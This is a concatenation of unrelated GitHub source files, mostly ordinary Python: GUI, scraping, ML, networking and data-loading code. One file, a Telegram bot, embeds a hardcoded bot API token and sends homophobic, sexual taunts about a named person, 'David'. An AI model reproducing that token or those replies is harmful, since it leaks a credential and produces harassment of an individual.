pass\nrunSolution()\n","repo_name":"AlexanderDLe/Python_DataStructuresAndAlgorithms","sub_path":"Strings/StringsDifferByOneCharacter.py","file_name":"StringsDifferByOneCharacter.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14349526253","text":"from tkinter import *\r\nfrom tkinter import filedialog\r\nfrom PIL import Image, ImageTk\r\nfrom pdf2image import convert_from_path\r\nfrom tkPDFViewer import tkPDFViewer as pdf\r\nimport os\r\n\r\n\r\n# Creating Tk container\r\nroot = Tk()\r\n\r\nroot.geometry(\"800x800\")\r\nroot.title('Pdf Viewer')\r\nroot.configure(bg=\"white\")\r\n\r\n\r\ndef browseFiles():\r\n filename = filedialog.askopenfilename(initialdir = os.getcwd(),\r\n title = 'select pdf file',\r\n filetype = (('PDF FILE','.pdf'),\r\n ('PDF FILE','.PDF'),\r\n ('ALL FILE','.txt')\r\n ))\r\n pdf_frame = Frame(root).pack(fill=BOTH, expand=1)\r\n # Adding Scrollbar to the PDF frame\r\n scrol_y = Scrollbar(pdf_frame, orient=VERTICAL)\r\n # Adding text widget for inserting images\r\n pdf = Text(pdf_frame, yscrollcommand=scrol_y.set, bg=\"white\")\r\n # Setting the scrollbar to the right side\r\n scrol_y.pack(side=RIGHT, fill=Y)\r\n scrol_y.config(command=pdf.yview)\r\n # Finally packing the text widget\r\n pdf.pack(fill=BOTH, expand=1)\r\n # Here the PDF is converted to list of images\r\n pages = convert_from_path(filename, size=(800, 900))\r\n imglist = []\r\n for i, image in enumerate(pages):\r\n fname = 'C:/Users/Asus/Desktop/images/page' + str(i) + \".png\"\r\n image.save(fname, \"PNG\")\r\n imglist.append(image)\r\n pages = imglist\r\n # Empty list for storing images\r\n photos = []\r\n # Storing the converted images into list\r\n for i in range(len(pages)):\r\n photos.append(ImageTk.PhotoImage(pages[i]))\r\n # Adding all the images to the text widget\r\n for photo in photos:\r\n pdf.image_create(END, image=photo)\r\n\r\n # For Seperating the pages\r\n pdf.insert(END, '\\n\\n')\r\n mainloop()\r\n\r\nButton(root, text='open', command=browseFiles, width=20, font=\"arial 20\", 
bd=4).pack()\r\n\r\n\r\nroot.mainloop()","repo_name":"raneemammaralshamy/File-Editor","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"74868133239","text":"#Declare empty variables\nvalor=None #Absence of a value\n\n#Conditions\ncondicion=True\nif(condicion):\n print('True')\nelif(condicion>1):\n print('ElseIF')\nelse:\n print('Else')\n\n#Ternary if\nvalor='Blue' if condicion==False else 'Red'\n# Result: valueIfTrue condition valueIfFalse\n#Logical operators or,and,not \n\n#Repetition loops\ni=0\nwhile(i<10):\n print('w:',i)\n i+=1\nelse:\n print('End of while loop')\n#For, over any iterable type: list, tuple, dictionary, string\nfor i in range(0,10):\n print('f:',i) \n\n#range(11) <--> range(0,11), goes from 0 up to < 11, range(start,stop, step)\nnum=[2,4,5,6,9]\n#enumerate() function (list, tuple, or dictionary)\nfor indice,numero in enumerate(num):\n print(indice,numero)\n\n#Break or continue loops: break or continue\nfor caracter in \"Este es un texto\":\n if(caracter=='e'):\n #break\n continue\n print(caracter)\n\n","repo_name":"cristian3087/python-basico","sub_path":"6.Ciclos_Condiciones.py","file_name":"6.Ciclos_Condiciones.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"14018478557","text":"import dimod\n\nvalues = [['J67', -47.3],\n ['J16', 115.0],\t\t\t\t\t \n ['w7', 546.6], \n ['J01', -246.7], \n ['J25', 342.3],\t\t\t \n ['J02', -108.4],\n ['w0', 320.2],\n ['J26', 978.9],\n ['J12', 96.9],\n ['J56', -514.3],\t\t\t \t\t\t \n ['J36', -201.9],\n ['J06', 53.6],\n ['J34', 667.0],\n ['J24', -499.6],\n ['J35', -821.9],\n ['w2', -747.1],\t\t \t\t\t\t \n ['w3', 627.7],\n ['J17', -564.1],\n ['w1', 38.1],\t\t\t \n ['J07', 880.6],\n ['J03', 938.0],\n ['w5', 910.4],\n ['J57', 837.0],\n ['w6', -747.1],\n ['J14', -240.1],\n ['w4', 984.6],\n ['J04', -48.2],\n ['J05', -595.6],\n ['J45', -379.6],\n ['J47', 708.5],\n ['J15', 547.5],\n ['J46', -697.2],\n ['J37', -312.2],\n ['J13', 651.5],\n ['J27', -117.5],\n ['J23', -548.1]]\n\n#ground state supposed to be -747.1\n\nqubit = list()\nqubitwght = list()\ncoupler = list()\ncouplerwght = list()\n\nfor i in range(len(values)):\n if 'J' in values[i][0]:\n numbers = values[i][0][1:]\n coupler.append(('w{}'.format(numbers[0]),'w{}'.format(numbers[1])))\n couplerwght.append(values[i][1])\n if 'w' in values[i][0]:\n qubit.append(values[i][0])\n qubitwght.append(values[i][1])\n\nqubit_weights = {q:w for q,w in zip(qubit, qubitwght)}\ncoupler_weights = {c:w for c,w in zip(coupler,couplerwght)}\n\noffset = 0\n\nbqm = dimod.BinaryQuadraticModel(qubit_weights, coupler_weights, offset, dimod.BINARY)\nsampler = dimod.ExactSolver()\nresponse = sampler.sample(bqm)\n\ngroundstate = 1000000\nfor sample, energy in response.data(['sample','energy']):\n if energy= 0.01) or (angle <= -0.01):\n angle -= 2 * pi\n if (angle <= 0.01) and 
(angle >= -0.01):\n if aim is None:\n aim = 'aim'\n as_event('ON_DAMAGE_INDICATOR')\n return\n if aim is not None:\n aim = None\n as_event('ON_DAMAGE_INDICATOR')\n\n\n@registerEvent(SniperControlMode, 'handleMouseEvent')\ndef sniperHandleMouseEvent(self, dx, dy, dz):\n global aim\n if di:\n for value in di.values():\n angle = BigWorld.camera().direction.yaw + pi - value\n if (angle >= 0.01) or (angle <= -0.01):\n angle -= 2 * pi\n if (angle <= 0.01) and (angle >= -0.01):\n if aim is None:\n aim = 'aim'\n as_event('ON_DAMAGE_INDICATOR')\n return\n if aim is not None:\n aim = None\n as_event('ON_DAMAGE_INDICATOR')\n\n\n@overrideMethod(DamageIndicator, 'getDuration')\ndef DamageIndicator_getDuration(base, self):\n return 12\n\n\n@registerEvent(DamageIndicator, 'showHitDirection')\ndef DamageIndicator_showHitDirection(self, idx, hitData, timeLeft):\n global alpha, di\n di[idx] = hitData.getYaw()\n if alpha == 0:\n alpha = 100\n as_event('ON_DAMAGE_INDICATOR')\n\n\n@registerEvent(DamageIndicator, 'hideHitDirection')\ndef DamageIndicator_hideHitDirection(self, idx):\n global alpha, di\n if idx in di:\n del di[idx]\n if not di and (alpha == 100):\n alpha = 0\n as_event('ON_DAMAGE_INDICATOR')\n\n\n@registerEvent(Vehicle, '_Vehicle__onAppearanceReady')\ndef _Vehicle__onAppearanceReady(self, appearance):\n if self.isPlayerVehicle:\n global alpha, aim, di\n di = {}\n alpha = 0\n aim = None\n as_event('ON_DAMAGE_INDICATOR')\n\n\n@xvm.export('xvm.damageIndicator', deterministic=False)\ndef xvm_damageIndicator():\n return alpha\n\n\n@xvm.export('xvm.damageIndicator_aim', deterministic=False)\ndef xvm_damageIndicator_aim():\n return aim\n","repo_name":"Relhax-Modpack-Team/XvmDependencies","sub_path":"PY/Dependency_XVM_PY_SWF_damageIndicator/res_mods/configs/xvm/py_macro/damage_indicator.py","file_name":"damage_indicator.py","file_ext":"py","file_size_in_byte":3322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"24538554829","text":"import logging\nimport logging.handlers\nimport os\n\nclass Logger () :\n def __init__ (self, logName, logDirectory) :\n self.logger = logging.getLogger(logName)\n self.logger.setLevel(logging.DEBUG)\n\n try:\n os.mkdir(logDirectory)\n self.logger.info(\"Created log directory\")\n except OSError:\n self.logger.info(\"Log directory already exists\")\n \n # create file handler which logs even debug messages\n self.fh = logging.handlers.RotatingFileHandler(logDirectory + \"/\" + logName + \".log\",maxBytes=1000000,backupCount=10)\n self.fh.setLevel(logging.DEBUG)\n # create console handler with a higher log level\n self.ch = logging.StreamHandler()\n self.ch.setLevel(logging.WARNING)\n # create formatter and add it to the handlers\n self.formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n self.fh.setFormatter(self.formatter)\n self.ch.setFormatter(self.formatter)\n # add the handlers to the logger\n self.logger.addHandler(self.fh)\n self.logger.addHandler(self.ch)\n \n def getLogger (self) :\n return self.logger\n\n","repo_name":"muddychris/pvMonitor","sub_path":"utils/Logger.py","file_name":"Logger.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"20012433393","text":"import logging\n\nfrom dataall.modules.datasets_base.db.dataset_models import DatasetBucket, Dataset\n\nlogger = logging.getLogger(__name__)\n\n\nclass DatasetBucketRepository:\n\n @staticmethod\n def create_dataset_bucket(\n 
session,\n dataset: Dataset,\n data: dict = None\n ) -> DatasetBucket:\n bucket = DatasetBucket(\n datasetUri=dataset.datasetUri,\n label=data.get('label'),\n description=data.get('description', 'No description provided'),\n tags=data.get('tags', []),\n S3BucketName=dataset.S3BucketName,\n AwsAccountId=dataset.AwsAccountId,\n owner=dataset.owner,\n region=dataset.region,\n KmsAlias=dataset.KmsAlias,\n imported=dataset.imported,\n importedKmsKey=dataset.importedKmsKey,\n )\n session.add(bucket)\n session.commit()\n return bucket\n\n @staticmethod\n def delete_dataset_buckets(session, dataset_uri) -> bool:\n buckets = (\n session.query(DatasetBucket)\n .filter(DatasetBucket.datasetUri == dataset_uri)\n .all()\n )\n for bucket in buckets:\n session.delete(bucket)\n return True # honor the declared bool return type\n","repo_name":"awslabs/aws-dataall","sub_path":"backend/dataall/modules/datasets/db/dataset_bucket_repositories.py","file_name":"dataset_bucket_repositories.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":190,"dataset":"github-code","pt":"40"}
{"seq_id":"29309864409","text":"dictionary = {\r\n \"JAN\":\"01\",\r\n \"FEB\":\"02\",\r\n \"MAR\" :\"03\",\r\n \"APR\":\"04\",\r\n \"MAY\":\"05\",\r\n \"JUN\":\"06\",\r\n \"JUL\":\"07\",\r\n \"AUG\":\"08\",\r\n \"SEP\":\"09\",\r\n \"OCT\":\"10\",\r\n \"NOV\":\"11\",\r\n \"DEC\":\"12\",\r\n }\r\ndef splitdate():\r\n date = input(\"Enter date in the form dd-mmm-yy: \")\r\n split = date.split(\"-\")\r\n return split\r\n\r\n\r\nif __name__ == \"__main__\":\r\n x = splitdate()\r\n print(x)\r\n print(x[0])\r\n print(dictionary[x[1].upper()])\r\n print(x[2])\r\n \r\n \r\n","repo_name":"ZyadOsman/Programming-Challenges","sub_path":"Dictionary Challenge 1/Dictionary Challenge 1.py","file_name":"Dictionary Challenge 1.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"36497156963","text":"import json\nimport socket\nfrom threading import Thread\n\nfrom raft_py.raft import RaftCluster\n\n\nif __name__ == \"__main__\":\n serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n serversocket.bind(('0.0.0.0', 80))\n serversocket.listen(5)\n raft_cluster = RaftCluster()\n raft_cluster.start()\n\n def set_on_cluster(**kwargs):\n raft_cluster.set(**kwargs)\n\n def create_set_thread(clientsocket):\n data = clientsocket.recv(2048)\n payload = json.loads(data)\n return Thread(target= lambda: raft_cluster.set(**payload))\n\n while True:\n try:\n clientsocket, address = serversocket.accept()\n ct = create_set_thread(clientsocket)\n ct.start() # start() runs the target on the new thread; run() would execute it inline\n except KeyboardInterrupt:\n break\n\n raft_cluster.stop()\n raft_cluster._events[\"stopped\"].wait()\n","repo_name":"astepe/raft","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"19528521377","text":"from flask import Flask, redirect, url_for\napp = Flask(__name__)\n\n\njsonString = ''' \n{\n \"service_name\": \"myapplication\",\n \"version\": \"1.0.0\",\n \"git_commit_sha\" :\"abc5789789\",\n \"environment\" : {\n \"service_port\":\"8080\",\n \"log_level\":\"INFO\"\n }\n}'''\n\n@app.route('/info')\ndef processInfo():\n return jsonString\n\nif __name__ == '__main__':\n app.run(host ='0.0.0.0', port = 5001, debug = 
True)\n","repo_name":"balu-balaji/devops-new","sub_path":"InfoApp.py","file_name":"InfoApp.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17230306430","text":"import datetime\nimport os\nimport json\nfrom StringIO import StringIO\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm.exc import NoResultFound, MultipleResultsFound\n\nimport requests\nfrom dateutil.parser import parse as datetime_parse\n\nimport pandas as pd\n\n\ndef scrape_market(market_id):\n\n r = requests.get(\n 'https://www.predictit.org/Resource/DownloadMarketChartData',\n params={'marketid': market_id, 'timespan': '24h'})\n\n strio = StringIO()\n strio.write(r.content)\n strio.seek(0)\n\n df = pd.read_csv(strio)\n\n latest_timepoint = df['DateString'].min()\n return df[df['DateString'] == latest_timepoint]\n\n\nstarttime = datetime.datetime.now()\n\n# URL = 'https://www.predictit.org/Resource/DownloadMarketChartData\\?marketid\\=3633\\×pan\\=7d'\n\nURL = \"https://www.predictit.org/api/marketdata/all/\"\nresponse = requests.get(URL)\nall_markets = json.loads(response.text)['markets']\n\n\nengine = sqlalchemy.create_engine('sqlite:///' + os.getcwd() + '/pita.db')\nbase = automap_base()\nbase.prepare(engine, reflect=True)\nContracts = base.classes.Contracts\nVolumes = base.classes.Volumes\nsession = Session(engine)\n\nfor market_id in (k['id'] for k in all_markets):\n\n latest_values = scrape_market(market_id)\n\n for i, vals in latest_values.iterrows():\n\n timestamp = datetime_parse(vals['DateString'])\n contract_id = session.query(Contracts.contract_id)\\\n .filter_by(contract_predictit_id=vals['ContractId'])\\\n .scalar()\n\n row_exists = (session.query(Volumes.contract_id, Volumes.time_stamp)\n .filter(Volumes.time_stamp == timestamp)\n .filter(Volumes.contract_id == contract_id)\n .count()) >= 1\n\n if not row_exists:\n\n newprice = Volumes(\n contract_id=contract_id,\n open_share_price=vals['OpenSharePrice'],\n high_share_price=vals['HighSharePrice'],\n low_share_price=vals['LowSharePrice'],\n close_share_price=vals['CloseSharePrice'],\n volume=vals['TradeVolume'],\n time_stamp=timestamp)\n\n session.add(newprice)\nsession.commit()\n","repo_name":"Talophex/PITA","sub_path":"ScrapeVolumeData.py","file_name":"ScrapeVolumeData.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"} +{"seq_id":"12916824183","text":"from CodingInterviewGuide.C3_binary_tree import *\n\ntree = Node(1,\n Node(2,\n Node(4),\n Node(5)),\n Node(3,\n Node(6),\n Node(7)))\n\n\ndef pre_order_recur(root):\n if root:\n print(root)\n pre_order_recur(root.left)\n pre_order_recur(root.right)\n\n\ndef in_order_recur(root):\n if root:\n in_order_recur(root.left)\n print(root)\n in_order_recur(root.right)\n\n\ndef pos_order_recur(root):\n if root:\n pos_order_recur(root.left)\n pos_order_recur(root.right)\n print(root)\n\n\ndef pre_order_non_recur(root):\n stack = [root] if root else []\n\n while stack:\n cur = stack.pop()\n print(cur)\n if cur.right:\n stack.append(cur.right)\n if cur.left:\n stack.append(cur.left)\n\n\ndef in_order_non_recur(root):\n stack = Stack()\n stack.push(root)\n\n left_child_visited_nodes = set()\n\n while stack:\n top = stack.peek()\n if top.left and top not in left_child_visited_nodes:\n stack.push(top.left)\n 
else:\n cur = stack.pop()\n print(cur)\n if not stack.empty():\n left_child_visited_nodes.add(stack.peek())\n if cur.right:\n stack.push(cur.right)\n\n\nif __name__ == \"__main__\":\n # pre_order_recur(tree)\n # in_order_recur(tree)\n # pos_order_recur(tree)\n # pre_order_non_recur(tree)\n in_order_non_recur(tree)\n","repo_name":"albertmenglongli/Algorithms","sub_path":"CodingInterviewGuide/C3_binary_tree/walk_through.py","file_name":"walk_through.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"}
{"seq_id":"12758490623","text":"import yaml\n\n\ncomp_replica = int(snakemake.params.conf[\"comp_replica\"])\nreplica = int(snakemake.params.conf[\"replica\"])\nhyperbolic_dim = int(snakemake.params.conf[\"hyperbolic_dim\"])\nname = snakemake.params.wildcard_pattern.format(\n comp_replica=comp_replica, replica=replica, hyperbolic_dim=hyperbolic_dim\n)\n\nwith open(snakemake.input.plain) as f:\n plain_config = yaml.load(f, Loader=yaml.SafeLoader)\n\nplain_config[\"trainer\"][\"callbacks\"] = [\n {\n \"class_path\": \"pytorch_lightning.callbacks.ModelCheckpoint\",\n \"init_args\": {\n \"monitor\": \"train_loss\",\n \"dirpath\": \"data/mds/models\",\n \"filename\": name,\n \"mode\": \"min\",\n \"save_last\": True,\n },\n },\n]\nplain_config[\"trainer\"][\"logger\"] = {\n \"class_path\": \"pytorch_lightning.loggers.TensorBoardLogger\",\n \"init_args\": {\n \"save_dir\": \"data/mds/tensorboard\",\n \"name\": name,\n },\n}\n\nplain_config[\"model\"][\"replica\"] = replica\nplain_config[\"model\"][\"hyperbolic_dim\"] = hyperbolic_dim\nplain_config[\"model\"][\"data_dir\"] = \"./data/raw/data\"\n\nwith open(snakemake.output.conf, \"w\") as f:\n yaml.dump(plain_config, f)\n","repo_name":"gatoniel/transcription-data-analysis","sub_path":"src/mds_create_configs.py","file_name":"mds_create_configs.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"37622319406","text":"# The XOR (exclusive or) problem cannot be separated linearly; an SVM using the kernel trick can classify it, since the trick effectively increases the dimensionality.\n\nx_data = [ # xor case\n [0,0,0],\n [0,1,1],\n [1,0,1],\n [1,1,0],\n]\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import svm, metrics\n\nx_df = pd.DataFrame(x_data)\nfeature = np.array(x_df.iloc[:,0:2])\nlabel = np.array(x_df.iloc[:,2])\nprint(feature)\nprint(label)\n\n# Exercise 1 : LogisticRegression\nmodel = LogisticRegression()\nmodel.fit(feature, label)\npred = model.predict(feature)\nprint('predicted -', pred)\nprint('actual -', label)\nprint('accuracy : ', metrics.accuracy_score(label, pred)) # accuracy : 0.75\nprint(\"-------\"*20)\n\n# Exercise 2 : SVC\nmodel2 = svm.SVC(C=1) # the C argument is passed to help prevent overfitting.\n# model2 = svm.LinearSVC(C=1) # faster than SVC\nmodel2.fit(feature, label)\npred2 = model2.predict(feature)\nprint('predicted -', pred2)\nprint('actual -', label)\nprint('accuracy : ', metrics.accuracy_score(label, pred2)) # accuracy : 0.75\n\n","repo_name":"Parkjuseong319/test","sub_path":"pypro2anal3/anal3_classification/cla15_SVM.py","file_name":"cla15_SVM.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"20108530956","text":"#!/usr/bin/env python\r\n\"\"\"\r\n\r\nGetter Setter Generator\r\n\r\nSam Zielke-Ryner (samzielkeryner@gmail.com)\r\n\r\n\"\"\"\r\n\r\n\r\nimport wx\r\n\r\n\r\nclass FileDrop( wx.FileDropTarget ):\r\n\r\n ## Class Functions: ##\r\n\r\n def __init__( self, _window, _parent_frame ):\r\n \"\"\" Constructor: \"\"\"\r\n\r\n wx.FileDropTarget.__init__( self )\r\n\r\n self.window = _window\r\n self.parent_frame = _parent_frame\r\n\r\n\r\n def OnDropFiles( self, x, y, fileNames ):\r\n \"\"\" Post: This function is called when a file is dragged & dropped\r\n onto the input TextCtrl widget. This function informs\r\n the View component that the source code has been changed\r\n (if it is valid). \"\"\"\r\n\r\n # if a folder/directory has not been dropped onto the window/TextCtrl\r\n if len( fileNames ) == 1:\r\n\r\n # event = wx.DropFilesEvent( id=wx.wxEVT_DROP_FILES, noFiles=len(fileNames), file=fileNames[0] )\r\n self.parent_frame.notify_file_drop( fileNames[0] )\r\n\r\n else:\r\n\r\n self.parent_frame.show_error_dialog( \"Input must be a single file & not a directory. 
\\nPlease try again\" )\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"sqzr1/Getter-Setter-Generator","sub_path":"gsg/file_drop.py","file_name":"file_drop.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"6163675931","text":"'''\nCitations\nhttps://kdchin.gitbooks.io/sockets-module-manual/content/\nhttps://www.gitbook.com/book/qwewy/pygame-module-manual/details\nhttps://qwewy.gitbooks.io/pygame-module-manual/content/chapter1/framework.html\nhttps://www.reddit.com/r/pygame/comments/3y03c9/how_to_check_if_sprite_group_is\n_empty/?st=jagatxz5&sh=ecede6cf\nhttp://millionthvector.blogspot.com/p/free-sprites.html\nhttps://www.youtube.com/watch?v=EF_8ZFSxgyQ\nhttps://stackoverflow.com/questions/38028970/how-to-assign-sounds-to-channels-in-pygame\nhttps://www.pygame.org/docs/\nhttp://hpr2.org/post/conversation-wednesday-june-21st-2017\nhttps://www.youtube.com/watch?v=t3eh6YiyCoQ\nhttps://www.youtube.com/watch?v=W1xwTqgzQ_g\n'''\n####################################\n# TP3\n# by Calvin ZH Qiao\n# AndrewID: zhuhanq \n####################################\n'''\nGame Goal\nCollect \"1\", \"1\", \"2\" elements in each round from each boss to enter the \n112 planet\n'''\n\nimport socket\nimport threading\nfrom queue import Queue\nimport time\n\nHOST = \"localhost\" # put your IP address here if playing on multiple computers\nPORT = 50003\nBACKLOG = 4\n\ntimer = 0\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nserver.bind((HOST,PORT))\nserver.listen(BACKLOG)\nprint(\"looking for connection\")\n\ndef handleClient(client, serverChannel, cID, clientele):\n client.setblocking(1)\n msg = \"\"\n while True:\n try:\n msg += client.recv(10).decode(\"UTF-8\")\n command = msg.split(\"\\n\")\n while (len(command) > 1):\n readyMsg = command[0]\n msg = \"\\n\".join(command[1:])\n serverChannel.put(str(cID) + \" \" + readyMsg)\n command = msg.split(\"\\n\")\n except:\n # we failed\n return\n\ndef serverThread(clientele, serverChannel):\n timer = 0\n \n while True:\n timer += 1\n # print(\"timer = \", timer)\n msg = serverChannel.get(True, None)\n # print(\"got here\")\n # print(\"msg recv: \", msg)\n msgList = msg.split(\" \")\n senderID = msgList[0]\n instruction = msgList[1]\n details = \" \".join(msgList[2:])\n if (details != \"\"):\n for cID in clientele:\n if cID != senderID:\n sendMsg = instruction + \" \" + senderID + \" \" + details + \"\\n\"\n clientele[cID].send(sendMsg.encode())\n print(\"> sent to %s:\" % cID, sendMsg[:-1])\n print()\n serverChannel.task_done()\n\nclientele = dict()\nplayerNum = 0\n\nserverChannel = Queue(100)\nthreading.Thread(target = serverThread, args = (clientele, serverChannel)).start()\n\nnames = [\"PlayerOne\", \"PlayerTwo\", \"PlayerThree\", \"PlayerFour\"]\n# only plan to use first two players \n\nwhile True:\n # print(time.time())\n client, address = server.accept()\n # myID is the key to the client in the clientele dictionary\n myID = names[playerNum]\n # print(myID, playerNum)\n for cID in clientele:\n # print (repr(cID), repr(playerNum))\n clientele[cID].send((\"newPlayer %s\\n\" % myID).encode())\n client.send((\"newPlayer %s\\n\" % cID).encode())\n clientele[myID] = client\n client.send((\"myIDis %s \\n\" % myID).encode())\n # print(\"connection recieved from %s\" % myID)\n threading.Thread(target = handleClient, args = \n (client ,serverChannel, myID, clientele)).start()\n playerNum += 
1\n","repo_name":"calvinqiao/Multi-Player-Space-Shooting-Game","sub_path":"Game Server.py","file_name":"Game Server.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41012755050","text":"# -*- coding: iso-8859-1 -*-\n\nimport re\n\nclass AgentActionsReader(object):\n\n @staticmethod\n def parse(conf_string):\n # Example: conf_string = 'engine.widgets.actions_on_tree': ActionOnTree\n action_regex = re.search('\"(.*)\"\\s*:\\s*(\\w+)', conf_string.strip(), re.IGNORECASE)\n module = action_regex.group(1)\n className = action_regex.group(2)\n #print(\"module: %s\" % module)\n #print(\"className: %s\" % className)\n module = __import__(module, {}, {}, className)\n actionInstance = getattr(module, className )()\n return actionInstance\n \n","repo_name":"jchome/PSP-SimpleGame","sub_path":"engine/agent_actions_reader.py","file_name":"agent_actions_reader.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"36737581093","text":"import telebot\nimport webbrowser\nfrom telebot import types\n\n# assign token to var\nbot = telebot.TeleBot('6406707049:AAE4aPHKzlaafzZ_yjNlnvhw1uenB_Oq4DM')\n\n\n# decorator to interact with /start can put other commands also\n@bot.message_handler(commands=['start']) # commanads in telegram on which execute main()\ndef start(message):\n markup = types.ReplyKeyboardMarkup()\n btn1 = types.KeyboardButton('Who is gay?')\n btn2 = types.KeyboardButton('David Gay')\n btn3 = types.KeyboardButton('David not a gay!')\n markup.row(btn1)\n markup.row(btn2, btn3)\n bot.send_message(message.chat.id, f'Hi! {message.from_user.first_name}', reply_markup=markup)\n # to use buttons register func\n bot.register_next_step_handler(message, on_click)\ndef on_click(message):\n if message.text == 'Who is gay?':\n bot.send_message(message.chat.id, 'David for sure')\n elif message.text == 'David Gay':\n bot.send_message(message.chat.id, 'For sure')\n elif message.text == 'David not a gay!':\n bot.send_message(message.chat.id, 'DAVID LOVE BIG COCKS')\n\n@bot.message_handler(commands=['file']) # commanads in telegram on which execute main()\ndef file(message):\n markup = types.ReplyKeyboardMarkup()\n btn1 = types.KeyboardButton('Nice photo')\n markup.add(btn1)\n file = open('./Astro.png', 'rb')\n # same for video audio etc\n bot.send_photo(message.chat.id, file, reply_markup=markup )\n # to use buttons register func\n bot.register_next_step_handler(message, on_click)\ndef on_click(message):\n if message.text == 'Nice photo':\n bot.send_message(message.chat.id, '❤️')\n\n@bot.message_handler(commands=['help'])\ndef main(message):\n # format msg using html tags\n bot.send_message(message.chat.id, 'Help information', parse_mode='html')\n\n\n@bot.message_handler()\ndef info(message):\n if message.text.lower() == 'hello':\n bot.send_message(message.chat.id, f'Hi! 
{message.from_user.first_name}')\n elif message.text.lower() == 'id':\n bot.reply_to(message, f'ID {message.from_user.id}')\n\n\n@bot.message_handler(commands=['site', 'website'])\ndef site(message):\n webbrowser.open('https://hackscope.net')\n\n\n# buttons\n@bot.message_handler(content_types=['photo', 'video'])\ndef get_content(message):\n markup = types.InlineKeyboardMarkup()\n btn1 = types.InlineKeyboardButton('Open website', url='https://hackscope.net')\n btn2 = types.InlineKeyboardButton('Delete photo', callback_data='delete')\n btn3 = types.InlineKeyboardButton('Edit text', callback_data='edit')\n markup.row(btn1)\n markup.row(btn2, btn3)\n bot.reply_to(message, 'What a beautiful photo!', reply_markup=markup)\n\n\n# this method process callback_data\n# create anonymous func if empty return true\n@bot.callback_query_handler(func=lambda callback: True)\ndef callback_message(callback):\n if callback.data == 'delete':\n # message_id current msg\n bot.delete_message(callback.message.chat.id, callback.message.message_id - 1)\n elif callback.data == 'edit':\n bot.edit_message_text('Edit text', callback.message.chat.id, callback.message.message_id)\n\n\n# execute code unstoppable\n# or bot.infinity_polling()\nbot.polling(none_stop=True)\n","repo_name":"DANYKORD/kyotobot","sub_path":"msgs_buttons.py","file_name":"msgs_buttons.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37251903712","text":"import pytorch_lightning as pl\nfrom torch.utils.data import DataLoader, Dataset\nfrom torchvision import transforms as T\n\nfrom PIL import Image\nimport os\n\n\nclass C10IMG_MOBILE(Dataset):\n def __init__(self, transform, data_dir):\n self.transform = transform\n self.data_dir = data_dir\n\n def __len__(self):\n return 5000\n\n def __getitem__(self, item):\n img = Image.open(os.path.join(self.data_dir, str(item)+'.png')).convert('RGB')\n return self.transform(img)\n\n\nclass C10IMGDATA_MOBILE(pl.LightningDataModule):\n def __init__(self, args):\n super().__init__()\n self.hparams = args\n self.mean = (0.4914, 0.4822, 0.4465)\n self.std = (0.2471, 0.2435, 0.2616)\n\n def dataloader(self):\n transform = T.Compose(\n [\n T.ToTensor(),\n T.Normalize(self.mean, self.std),\n ]\n )\n dataset = C10IMG_MOBILE(transform=transform,\n data_dir=self.hparams.data_dir)\n dataloader = DataLoader(\n dataset,\n batch_size=self.hparams.batch_size,\n )\n return dataloader\n\n\nclass C10IMG(Dataset):\n def __init__(self, transform, model_name, data_dir):\n self.transform = transform\n self.model_name = model_name\n self.data_dir = data_dir\n self.original_path = os.path.join(self.data_dir, 'cifar10')\n self.perturbed_path = os.path.join(self.data_dir, self.model_name)\n self.data_list = os.listdir(self.original_path)\n\n def __len__(self):\n return 5000\n\n def __getitem__(self, index):\n img_name = self.data_list[index]\n original_img = Image.open(os.path.join(self.original_path, img_name)).convert('RGB')\n perturbed_img = Image.open(os.path.join(self.perturbed_path, img_name))\n return self.transform(original_img), self.transform(perturbed_img), int(img_name[-5:-4])\n\n\nclass C10IMGDATA(pl.LightningDataModule):\n def __init__(self, args):\n 